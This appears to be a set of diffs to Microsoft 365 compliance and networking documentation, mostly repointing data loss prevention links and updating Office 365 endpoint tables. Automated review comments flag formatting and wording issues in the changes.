+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md
description: "Microsoft 365 Endpoint data loss prevention extends monitoring of
# Learn about Microsoft 365 Endpoint data loss prevention
-You can use Microsoft 365 data loss prevention (DLP) to monitor the actions that are being taken on items you've determined to be sensitive and to help prevent the unintentional sharing of those items. For more information on DLP, see [Overview of data loss prevention](data-loss-prevention-policies.md).
+You can use Microsoft 365 data loss prevention (DLP) to monitor the actions that are being taken on items you've determined to be sensitive and to help prevent the unintentional sharing of those items. For more information on DLP, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
**Endpoint data loss prevention** (Endpoint DLP) extends the activity monitoring and protection capabilities of DLP to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Now that you've learned about Endpoint DLP, your next steps are:
- [Getting started with Microsoft Endpoint data loss prevention](endpoint-dlp-getting-started.md) - [Using Microsoft Endpoint data loss prevention](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Using https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-using.md
To help familiarize you with Endpoint DLP features and how they surface in DLP p
> [!IMPORTANT] > These Endpoint DLP scenarios are not the official procedures for creating and tuning DLP policies. Refer to the below topics when you need to work with DLP policies in general situations:
->- [Overview of data loss prevention](data-loss-prevention-policies.md)
+
+>- [Learn about data loss prevention](dlp-learn-about-dlp.md)
>- [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md) >- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) >- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md)
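Review bot: The added blank line between the "> [!IMPORTANT]" text and the ">- [Learn about data loss prevention]" item ends the blockquote, so the link list is likely to render as a separate quote block outside the IMPORTANT callout. The equivalent change in dlp-on-premises-scanner-use.md swaps the link without inserting a blank line; do the same here, or prefix the separator line with ">" if spacing is wanted.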
These scenarios require that you already have devices onboarded and reporting in
- [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md) - [Get started with Endpoint data loss prevention](endpoint-dlp-getting-started.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Get Started With The Default Dlp Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/get-started-with-the-default-dlp-policy.md
To quickly refine the default DLP policy, you can choose to have it:
- Block access to the content containing the sensitive information, but allow the user to override and share or send if they need to.
-For more information on incident reports or restricting access, see [Overview of data loss prevention policies](data-loss-prevention-policies.md).
+For more information on incident reports or restricting access, see [Data loss prevention reference](data-loss-prevention-policies.md).
If you want to change these options later, you can edit the default DLP policy at any time - see the next section.
compliance How Dlp Works Between Admin Centers https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/how-dlp-works-between-admin-centers.md
In Office 365, you can create a data loss prevention (DLP) policy in two different admin centers: -- In the **Security & Compliance Center**, you can create a single DLP policy to help protect content in SharePoint, OneDrive, Exchange, and now Microsoft Teams. When possible, we recommend that you create a DLP policy here. For more information, see [DLP in the Security & Compliance Center](data-loss-prevention-policies.md).
+- In the **Security & Compliance Center**, you can create a single DLP policy to help protect content in SharePoint, OneDrive, Exchange, and now Microsoft Teams. When possible, we recommend that you create a DLP policy here. For more information, see [Data Loss Prevention reference](data-loss-prevention-policies.md).
- In the **Exchange admin center**, you can create a DLP policy to help protect content only in Exchange. This policy can use Exchange mail flow rules (also known as transport rules), so it has more options specific to handling email. For more information, see [DLP in the Exchange admin center](/exchange/security-and-compliance/data-loss-prevention/data-loss-prevention).
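Review bot: The new link text "Data Loss Prevention reference" is capitalized differently from the same link in get-started-with-the-default-dlp-policy.md, which this change set sets to "Data loss prevention reference". Pick one casing, preferably matching the target article's title, and use it in both places. The new text also loses the parallel with "DLP in the Exchange admin center" in the next bullet, so check that the sentence still tells the reader which admin center the linked article covers.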
compliance Information Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/information-protection.md
Last updated audience: Admin-+ localization_priority: Priority search.appverid:
search.appverid:
- m365solution-mip - m365initiative-compliance
+recommendations: false
description: "Implement Microsoft Information Protection (MIP) to help you protect sensitive information wherever it lives or travels."
To help prevent accidental oversharing of sensitive information, use the followi
|Capability|What problems does it solve?|Get started| |:|:|:|
-|[Data loss prevention (DLP)](data-loss-prevention-policies.md)| Helps prevent unintentional sharing of sensitive items. | [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md)|
+|[Learn about data loss prevention](dlp-learn-about-dlp.md)| Helps prevent unintentional sharing of sensitive items. | [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md)|
|[Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)| Extends DLP capabilities to items that are used and shared on Windows 10 computers. | [Get started with Endpoint data loss prevention](endpoint-dlp-getting-started.md)| |[Learn about the Microsoft Compliance Extension (preview)](dlp-chrome-learn-about.md) | Extends DLP capabilities to the Chrome browser | [Get started with the Microsoft Compliance Extension (preview)](dlp-chrome-get-started.md)| |[Learn about Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-learn.md)|Extends DLP monitoring of file activities and protective actions for those files to on-premises file shares and SharePoint folders and document libraries.|[Get started with Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-get-started.md)|
-|[Protect sensitive information in Microsoft Teams chat and channel messages](dlp-microsoft-teams.md) | Extends some DLP functionality to Teams chat and channel messages | [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)|
+|[Protect sensitive information in Microsoft Teams chat and channel messages](dlp-microsoft-teams.md) | Extends some DLP functionality to Teams chat and channel messages | [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)|
++
+## Additional resources
+
+Many organizations are using these information protection capabilities to comply with data privacy regulations. To help, weΓÇÖve designed a workflow to guide you through an end-to-end process to plan and implement capabilities across Microsoft 365, including secure access, threat protection, information protection, and data governance. For more information, see [Deploy information protection for data privacy regulations with Microsoft 365](../solutions/information-protection-deploy.md) (aka.ms/m365dataprivacy).
+
+Additionally, To help you plan an integrated strategy for implementing information protection capabilities, download the *Microsoft 365 information protection and compliance capabilities* set of illustrations. Feel free to adapt these illustrations for your own use.
+
+| Item | Description |
+|:--|:|
+|[![Model poster: Microsoft 365 information protection and compliance capabilities](../media/solutions-architecture-center/m365-compliance-illustrations-thumb.png)](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.pdf) <br/> [Download as a PDF](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.pdf) \| [Download as a Visio](https://download.microsoft.com/download/3/a/6/3a6ab1a3-feb0-4ee2-8e77-62415a772e53/m365-compliance-illustrations.vsdx) <br/> Japanese: [Download as a PDF](https://download.microsoft.com/download/6/f/1/6f1a7d0e-dd8e-442e-b073-8e94327ae4f8/m365-compliance-illustrations.pdf) \| [Download as a Visio](https://download.microsoft.com/download/6/f/1/6f1a7d0e-dd8e-442e-b073-8e94327ae4f8/m365-compliance-illustrations.vsdx) <br/> Updated October 2020|Includes: <ul><li> Microsoft information protection and data loss prevention</li><li>Retention policies and retention labels </li><li>Information barriers</li><li>Communication compliance</li><li>Insider risk management</li><li>Third-party data ingestion</li>|
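Review bot: The description cell in the added table row opens a "<ul>" but never closes it; the cell ends with "<li>Third-party data ingestion</li>|". Add "</ul>" before the closing pipe so the list does not depend on the renderer's error recovery. In the paragraph above the table, "Additionally, To help you plan" has a stray capital "T". The first table cell was also changed from the capability name "Data loss prevention (DLP)" to the article title "Learn about data loss prevention" under a column headed "Capability"; confirm that is intended.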
compliance Keyword Queries And Search Conditions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/keyword-queries-and-search-conditions.md
For more information about creating queries using the `SensitiveType` property,
Then you can use the ID in the `SensitiveType` search property to return documents that contain the custom sensitive data type; for example, `SensitiveType:7e13277e-6b04-3b68-94ed-1aeb9d47de37` -- You can't use sensitive information types and the `SensitiveType` search property to search for sensitive data at-rest in Exchange Online mailboxes. This includes 1:1 chat messages, 1:N group chat messages, and team channel conversations in Microsoft teams because all of this content is stored in mailboxes. However, you can use data loss prevention (DLP) policies to protect sensitive email data in transit. For more information, see [Overview of data loss prevention policies](data-loss-prevention-policies.md) and [Search for and find personal data](/compliance/regulatory/gdpr).
+- You can't use sensitive information types and the `SensitiveType` search property to search for sensitive data at-rest in Exchange Online mailboxes. This includes 1:1 chat messages, 1:N group chat messages, and team channel conversations in Microsoft teams because all of this content is stored in mailboxes. However, you can use data loss prevention (DLP) policies to protect sensitive email data in transit. For more information, see [Learn about data loss prevention](dlp-learn-about-dlp.md) and [Search for and find personal data](/compliance/regulatory/gdpr).
## Search operators
compliance Manage Information Governance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/manage-Information-governance.md
audience: Admin-+ localization_priority: Priority search.appverid: - MOE150 - MET150
+recommendations: false
description: "Implement Microsoft Information Governance capabilities to govern your data for compliance or regulatory requirements."
compliance Microsoft 365 Compliance Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/microsoft-365-compliance-center.md
In addition to links in cards on the home page, you'll see a navigation pane on
| | | |||
-|![Navigation in the Microsoft 365 compliance center](../medi) <br> Automate and simplify the retention schedule for regulatory, legal and business-critical records in your organization.
+|![Navigation in the Microsoft 365 compliance center](../medi) <br> Automate and simplify the retention schedule for regulatory, legal and business-critical records in your organization.
## How do I get the compliance center?
To go there, in the Microsoft 365 compliance center, in the navigation pane on t
- **Configure insider risk management policies** to help minimize internal risks and enable you to detect, investigate, and take action for risky activities in your organization. See [Insider risk management](insider-risk-management.md). -- **Review your organization's data loss prevention policies** and make required changes as necessary. To learn more about, see [Overview of data loss prevention policies](data-loss-prevention-policies.md).
+- **Review your organization's data loss prevention policies** and make required changes as necessary. To learn more about, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
- **Get acquainted with and set up Microsoft Cloud App Security**. See [Quickstart: Get started with Microsoft Cloud App Security](/cloud-app-security/getting-started-with-cloud-app-security).
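Review bot: The rewritten bullet keeps the dangling phrase "To learn more about, see", which has no object after "about". Since the line is being touched anyway, change it to "To learn more, see [Learn about data loss prevention](dlp-learn-about-dlp.md)."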
compliance Microsoft 365 Solution Catalog https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/microsoft-365-solution-catalog.md
The **Information protection & governance** section shows you at a glance how yo
From here, you'll see cards for the following solutions: -- [Data loss prevention](data-loss-prevention-policies.md): Detects sensitive content as it's used and shared throughout your organization, in the cloud and on devices, and helps prevent accidental data loss.
+- [Data loss prevention](dlp-learn-about-dlp.md): Detects sensitive content as it's used and shared throughout your organization, in the cloud and on devices, and helps prevent accidental data loss.
- [Information governance](manage-information-governance.md): Manages your content lifecycle using solutions to import, store, and classify business-critical data so you can keep what you need and delete what you don't.ΓÇï - [Information protection](information-protection.md): Discovers, classifies, and protects sensitive and business-critical content throughout its lifecycle across your organization. - [Records management](records-management.md): Uses intelligent classification to automate and simplify the retention schedule for regulatory, legal, and business-critical records in your organization.
compliance Protect Documents That Have Fci Or Other Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/protect-documents-that-have-fci-or-other-properties.md
For more information, see [Manually request crawling and re-indexing of a site,
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md)
compliance Retention Limits https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/retention-limits.md
Last updated audience: Admin-+ localization_priority: Priority
search.appverid: - MOE150 - MET150
+hideEdit: true
description: "Understand the maximum number of policies and items per policy for retention policies and retention label policies"
compliance Sensitive Information Type Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitive-information-type-learn-about.md
Sensitive information types are pattern-based classifiers. They detect sensitive
## Sensitive information types are used in -- [Data loss prevention policies](data-loss-prevention-policies.md)
+- [Data loss prevention policies](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Retention labels](retention.md) - [Insider risk management](insider-risk-management.md)
compliance Sit Modify Edm Schema Configurable Match https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sit-modify-edm-schema-configurable-match.md
The `ignoredDelimiters` flag doesn't support:
- [Create a custom sensitive information type with Exact Data Match based classification](create-custom-sensitive-information-types-with-exact-data-match-based-classification.md) - [Sensitive information type-entity definitions](sensitive-information-type-entity-definitions.md) - [Custom sensitive information types](./sensitive-information-type-learn-about.md)-- [Overview of DLP policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Microsoft Cloud App Security](/cloud-app-security) - [New-DlpEdmSchema](/powershell/module/exchange/new-dlpedmschema)
compliance Use Drive Shipping To Import Pst Files To Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-drive-shipping-to-import-pst-files-to-office-365.md
To install the Azure Storage Explorer and connect to your Azure Storage area:
- Import data to [inactive mailboxes](create-and-manage-inactive-mailboxes.md) to archive data for compliance purposes.
- - Protect your organization against [data loss](data-loss-prevention-policies.md) of sensitive information.
+ - Protect your organization against [data loss](dlp-learn-about-dlp.md) of sensitive information.
- Here's an example of the secure storage account key and a BitLocker encryption key. This example also contains the syntax for the WAImportExport.exe command that you run to copy PST files to a hard drive. Be sure to take precautions to protect these just like you would protect passwords or other security-related information.
compliance Use Network Upload To Import Pst Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-network-upload-to-import-pst-files.md
After you create the import job in Step 5, Microsoft 365 analyzes the data in th
- Importing data to [inactive mailboxes](create-and-manage-inactive-mailboxes.md) to archive data for compliance purposes.
- - Using [data loss prevention policies](data-loss-prevention-policies.md) to prevent sensitive data from leaking outside your organization.
+ - Using [data loss prevention policies](dlp-learn-about-dlp.md) to prevent sensitive data from leaking outside your organization.
- Here's an example of the Shared Access Signature (SAS) URL that's obtained in Step 1. This example also contains the syntax for the command that you run in the AzCopy.exe tool to upload PST files. Be sure to take precautions to protect the SAS URL just like you would protect passwords or other security-related information.
compliance Use Notifications And Policy Tips https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-notifications-and-policy-tips.md
You can customize the text for policy tips separately from the email notificatio
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
-
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md)-- [DLP policy conditions, exceptions, and actions (preview)](./dlp-microsoft-teams.md?view=o365-worldwide)
-
+- [DLP policy conditions, exceptions, and actions (preview)](./dlp-microsoft-teams.md)
- [Create a DLP policy to protect documents with FCI or other properties](protect-documents-that-have-fci-or-other-properties.md)
-
- [What the DLP policy templates include](what-the-dlp-policy-templates-include.md)
-
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
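Review bot: The updated link "[DLP policy conditions, exceptions, and actions (preview)](./dlp-microsoft-teams.md)" only drops the "?view=o365-worldwide" query string and still pairs that link text with the Teams DLP article, which this same change set shows is titled around DLP for Microsoft Teams. Either point the link at the conditions, exceptions, and actions article or change the text to match the Teams target. The leading "./" can go as well, to match the other relative links in this list.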
enterprise Contoso Security Summary https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/contoso-security-summary.md
To follow security best practices and Microsoft 365 for enterprise deployment re
- Prevent intranet data leaks with Data Loss Prevention
- Contoso configured [Data Loss Prevention](../compliance/data-loss-prevention-policies.md) policies for Exchange Online, SharePoint, and OneDrive for Business to prevent users from accidentally or intentionally sharing sensitive data.
+ Contoso configured [Data Loss Prevention](../compliance/dlp-learn-about-dlp.md) policies for Exchange Online, SharePoint, and OneDrive for Business to prevent users from accidentally or intentionally sharing sensitive data.
- Prevent device data leaks Windows Information Protection
enterprise Microsoft 365 Vpn Implement Split Tunnel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-vpn-implement-split-tunnel.md
No, it does not, the Office 365 endpoints are not the same as the consumer servi
### How do I apply DLP and protect my sensitive data when the traffic no longer flows through my on-premises solution?
-To help you prevent the accidental disclosure of sensitive information, Office 365 has a rich set of [built-in tools](../compliance/data-loss-prevention-policies.md). You can use the built-in [DLP capabilities](../compliance/data-loss-prevention-policies.md) of Teams and SharePoint to detect inappropriately stored or shared sensitive information. If part of your remote work strategy involves a bring-your-own-device (BYOD) policy, you can use [app-based Conditional Access](/azure/active-directory/conditional-access/app-based-conditional-access) to prevent sensitive data from being downloaded to users' personal devices
+To help you prevent the accidental disclosure of sensitive information, Office 365 has a rich set of [built-in tools](../compliance/information-protection.md). You can use the built-in [DLP capabilities](../compliance/dlp-learn-about-dlp.md) of Teams and SharePoint to detect inappropriately stored or shared sensitive information. If part of your remote work strategy involves a bring-your-own-device (BYOD) policy, you can use [app-based Conditional Access](/azure/active-directory/conditional-access/app-based-conditional-access) to prevent sensitive data from being downloaded to users' personal devices
### How do I evaluate and maintain control of the user's authentication when they are connecting directly?
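Review bot: The rewritten DLP answer still ends at "users' personal devices" with no full stop; add it while the line is being touched. The two links that previously shared `data-loss-prevention-policies.md` now go to `information-protection.md` ("built-in tools") and `dlp-learn-about-dlp.md` ("DLP capabilities"). Confirm that `information-protection.md` actually covers tooling for preventing accidental disclosure, since that is what the sentence promises the reader.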
enterprise Office 365 Network Mac Perf Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/office-365-network-mac-perf-insights.md
For more information about how to resolve this issue, see [Egress network connec
## Network intermediary device
-This insight will be displayed if we detected devices between your users and Microsoft's network which may impact the Office 365 user experience. It is recommended that these be bypassed for specific Microsoft 365 network traffic that is destined for Microsoft datacenters. This recommendation is additionally described in [Microsoft 365 Network Connectivity Principles](microsoft-365-network-connectivity-principles.md)
+This insight will be displayed if we detected devices between your users and Microsoft's network which may impact the Office 365 user experience. It is recommended that these be bypassed for specific Microsoft 365 network traffic that is destined for Microsoft datacenters. This recommendation is additionally described in [Microsoft 365 Network Connectivity Principles](microsoft-365-network-connectivity-principles.md).
+
+One network intermediary insight we show is SSL break and inspection when critical Office 365 network endpoints for Exchange, SharePoint and Teams are intercepted and decrypted by network intermediary devices.
### What does this mean?
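Review bot: The added sentence on SSL break and inspection is hard to parse ("One network intermediary insight we show is SSL break and inspection when ...") and does not connect to the bypass recommendation in the paragraph above it. Suggest rewording along the lines of "One network intermediary insight is SSL break and inspect, shown when critical Office 365 network endpoints for Exchange, SharePoint and Teams are intercepted and decrypted by a network intermediary device", and stating that this is the case the bypass recommendation applies to. If the insight's name in the Admin Center permits, "TLS" or "SSL/TLS" would be the more accurate term.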
enterprise Office 365 Network Mac Perf Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/office-365-network-mac-perf-overview.md
The Microsoft 365 Admin Center now includes aggregated network connectivity metr
> [!div class="mx-imgBorder"] > ![Network connectivity test tool](../media/m365-mac-perf/m365-mac-perf-admin-center.png)
-**Network assessments** and **network insights** are displayed in the Microsoft 365 Admin Center under **Health | Connectivity**.
+**Network assessments** and **network insights** are displayed in the Microsoft 365 Admin Center under **Health | Network connectivity**.
> [!div class="mx-imgBorder"] > ![Network performance page](../media/m365-mac-perf/m365-mac-perf-page-nav.png) >[!NOTE]
->The network connectivity test tool supports tenants in WW Commercial and Germany but not GCC Moderate, GCC High, DoD or China.
+>Network connectivity in the Admin Center supports tenants in WW Commercial and Germany but not GCC Moderate, GCC High, DoD or China.
-When you first navigate to the network performance page, you will see an overview pane containing a map of global network performance, a network assessment scoped to the entire tenant, and a list of current issues. From the overview, you can drill down to view specific network performance metrics and issues by location. For more information, see [Network performance overview in the Microsoft 365 Admin Center](#network-connectivity-overview-in-the-microsoft-365-admin-center).
+When you first navigate to the network performance page, you will have to configure your locations in order to see the map of global network performance, a network assessment scoped to the entire tenant, percentage of your users working remotely vs onsite, and a list of current issues to take action on and/or to research further. From the overview pane, you can drill down to view specific network performance metrics and issues by location. For more information, see [Network performance overview in the Microsoft 365 Admin Center](#network-connectivity-overview-in-the-microsoft-365-admin-center).
-You may be asked to join the public preview for this feature on behalf of your organization. Acceptance usually happens immediately, after which you would see the network connectivity page.
+You may be asked to join the public preview for this feature on behalf of your organization. Acceptance usually happens immediately, after which you would see the network connectivity page.
-On navigating to the network connectivity page, you will see an overview pane containing a map of global network performance, a network assessment scoped to the entire tenant, percentage of your users working remotely vs onsite, and a list of current issues to take action on or to research further. To access this page, you must be an administrator for the organization within Microsoft 365. The Report Reader administrative role will have read access to this information. To configure locations and other elements of network connectivity an administrator must be part of a server administrator role such as the Service support admin role. From the overview, you can drill down to view specific network performance metrics and issues by location.
+To access the network connectivity page, you must be an administrator for the organization within Microsoft 365. The Report Reader administrative role will have read access to this information. To configure locations and other elements of network connectivity an administrator must be part of a server administrator role such as the Service support admin role.
## Pre-requisites for network connectivity assessments to appear
For this option, you must have at least two computers running at each office loc
Windows Location Service must be consented on the machines. You can test this by running the **Maps** app and locating yourself. It can be enabled on a single machine with **Settings | Privacy | Location** where the setting _Allow apps to access your location_ must be enabled. Windows Location Services consent can be deployed to PCs using MDM or Group Policy with the setting _LetAppsAccessLocation_.
-You do not need to add locations in the Admin Center with this method as they are automatically identified at the city resolution. You cannot show multiple office locations within a city using Windows Location Services. Location information is also rounded to the nearest 300 meters by 300 meters before being uploaded so that more precise location information is not possible to access.
+You do not need to add locations in the Admin Center with this method as they are automatically identified at the city resolution. Multiple office locations within the same city will not be shown when using Windows Location Services. Location information is rounded to the nearest 300 metres by 300 metres so that more precise location information is not accessed.
The machines should have Wi-Fi networking rather than an ethernet cable. Machines with an ethernet cable do not have accurate location information.
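Review bot: The rewritten location-rounding sentence drops "before being uploaded", which was the clause telling readers that the 300 by 300 rounding happens before the data leaves the machine; "so that more precise location information is not accessed" is weaker and does not say who would be doing the accessing. Keep the original clause. The same line changes "meters" to "metres", which is inconsistent with the text it replaces. In the access paragraph, "a server administrator role such as the Service support admin role" is carried over unchanged from the removed text; check whether "service administrator role" was intended. The public-preview paragraph is shown as removed and re-added with identical wording, so it is presumably a whitespace-only change and could be left out of the diff.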
includes Office 365 U.S. Government Dod Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/office-365-u.s.-government-dod-endpoints.md
<!--THIS FILE IS AUTOMATICALLY GENERATED. MANUAL CHANGES WILL BE OVERWRITTEN.--> <!--Please contact the Office 365 Endpoints team with any questions.-->
-<!--USGovDoD endpoints version 2021032900-->
-<!--File generated 2021-03-29 11:00:02.9768-->
+<!--USGovDoD endpoints version 2021042900-->
+<!--File generated 2021-04-29 17:00:04.1349-->
## Exchange Online
ID | Category | ER | Addresses | Ports
-- | - | | - | - 11 | Allow<BR>Required | Yes | `*.dod.online.office365.us`<BR>`52.127.80.0/23, 52.181.164.39/32, 52.182.95.191/32` | **TCP:** 443 12 | Default<BR>Required | Yes | `*.dod.cdn.office365.us`<BR>`52.181.164.39/32, 52.182.95.191/32` | **TCP:** 443
-13 | Allow<BR>Required | Yes | `*.gov.us.microsoftonline.com, adminwebservice.gov.us.microsoftonline.com, becws.gov.us.microsoftonline.com, dod-graph.microsoft.us, graph.microsoftazure.us, login.microsoftonline.us, provisioningapi.gov.us.microsoftonline.com`<BR>`20.140.232.0/23, 52.126.194.0/23, 2001:489a:3500::/50` | **TCP:** 443
+13 | Allow<BR>Required | Yes | `*.gov.us.microsoftonline.com, dod-graph.microsoft.us, graph.microsoftazure.us, login.microsoftonline.us`<BR>`20.140.232.0/23, 52.126.194.0/23, 2001:489a:3500::/50` | **TCP:** 443
14 | Default<BR>Required | No | `*.msauth.net, *.msauthimages.us, *.msftauth.net, *.msftauthimages.us, clientconfig.microsoftonline-p.net, graph.windows.net, login.microsoftonline.com, login.microsoftonline-p.com, login.windows.net, loginex.microsoftonline.com, login-us.microsoftonline.com, mscrl.microsoft.com, nexus.microsoftonline-p.com, secure.aadcdn.microsoftonline-p.com` | **TCP:** 443 15 | Allow<BR>Required | Yes | `portal.apps.mil, reports.apps.mil, webshell.dodsuite.office365.us, www.ohome.apps.mil`<BR>`52.127.72.42/32, 52.127.76.42/32, 52.180.251.166/32, 52.181.24.112/32, 52.181.160.19/32, 52.181.160.113/32, 52.181.160.236/32, 52.182.24.200/32, 52.182.54.237/32, 52.182.92.132/32` | **TCP:** 443 16 | Allow<BR>Required | Yes | `*.osi.apps.mil, dod.loki.office365.us`<BR>`52.127.72.0/21, 2001:489a:2206::/48` | **TCP:** 443
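Review bot: Row 13 drops `adminwebservice.gov.us.microsoftonline.com`, `becws.gov.us.microsoftonline.com` and `provisioningapi.gov.us.microsoftonline.com`, all of which are still matched by the `*.gov.us.microsoftonline.com` wildcard that stays in the row, so this reads as de-duplication rather than retirement of those hosts. The generated file records only the version bump from 2021032900 to 2021042900, which leaves anyone maintaining an explicit-FQDN allow list (rather than wildcards) unable to tell from this page whether the three hosts are still required. A one-line change note next to the version comment would settle it.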
includes Office 365 Worldwide Endpoints https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/includes/office-365-worldwide-endpoints.md
<!--THIS FILE IS AUTOMATICALLY GENERATED. MANUAL CHANGES WILL BE OVERWRITTEN.--> <!--Please contact the Office 365 Endpoints team with any questions.-->
-<!--Worldwide endpoints version 2021030100-->
-<!--File generated 2021-03-01 11:00:01.8084-->
+<!--Worldwide endpoints version 2021042900-->
+<!--File generated 2021-04-29 17:00:02.0425-->
## Exchange Online
ID | Category | ER | Addresses | Ports
11 | Optimize<BR>Required | Yes | `13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14` | **UDP:** 3478, 3479, 3480, 3481 12 | Allow<BR>Required | Yes | `*.lync.com, *.teams.microsoft.com, teams.microsoft.com`<BR>`13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14, 52.238.119.141/32, 52.244.160.207/32, 2603:1027::/48, 2603:1037::/48, 2603:1047::/48, 2603:1057::/48, 2620:1ec:6::/48, 2620:1ec:40::/42` | **TCP:** 443, 80 13 | Allow<BR>Required | Yes | `*.broadcast.skype.com, broadcast.skype.com`<BR>`13.107.64.0/18, 52.112.0.0/14, 52.120.0.0/14, 52.238.119.141/32, 52.244.160.207/32, 2603:1027::/48, 2603:1037::/48, 2603:1047::/48, 2603:1057::/48, 2620:1ec:6::/48, 2620:1ec:40::/42` | **TCP:** 443
-15 | Default<BR>Required | No | `*.sfbassets.com, *.urlp.sfbassets.com, skypemaprdsitus.trafficmanager.net` | **TCP:** 443, 80
+15 | Default<BR>Required | No | `*.sfbassets.com, skypemaprdsitus.trafficmanager.net` | **TCP:** 443, 80
16 | Default<BR>Required | No | `*.keydelivery.mediaservices.windows.net, *.msecnd.net, *.streaming.mediaservices.windows.net, ajax.aspnetcdn.com, mlccdn.blob.core.windows.net` | **TCP:** 443 17 | Default<BR>Required | No | `aka.ms, amp.azure.net` | **TCP:** 443 18 | Default<BR>Optional<BR>**Notes:** Federation with Skype and public IM connectivity: Contact picture retrieval | No | `*.users.storage.live.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
## Microsoft 365 Common and Office Online ID | Category | ER | Addresses | Ports
- | -- | | -- | -
+ | -- | | - | -
40 | Default<BR>Optional<BR>**Notes:** Office 365 Video CDNs | No | `ajax.aspnetcdn.com, r3.res.outlook.com, spoprod-a.akamaihd.net` | **TCP:** 443 41 | Default<BR>Optional<BR>**Notes:** Microsoft Stream | No | `*.microsoftstream.com, amp.azure.net, s0.assets-yammer.com, vortex.data.microsoft.com` | **TCP:** 443 42 | Default<BR>Optional<BR>**Notes:** Microsoft Stream CDN | No | `amsglob0cdnstream13.azureedge.net, amsglob0cdnstream14.azureedge.net` | **TCP:** 443
ID | Category | ER | Addresses | Ports
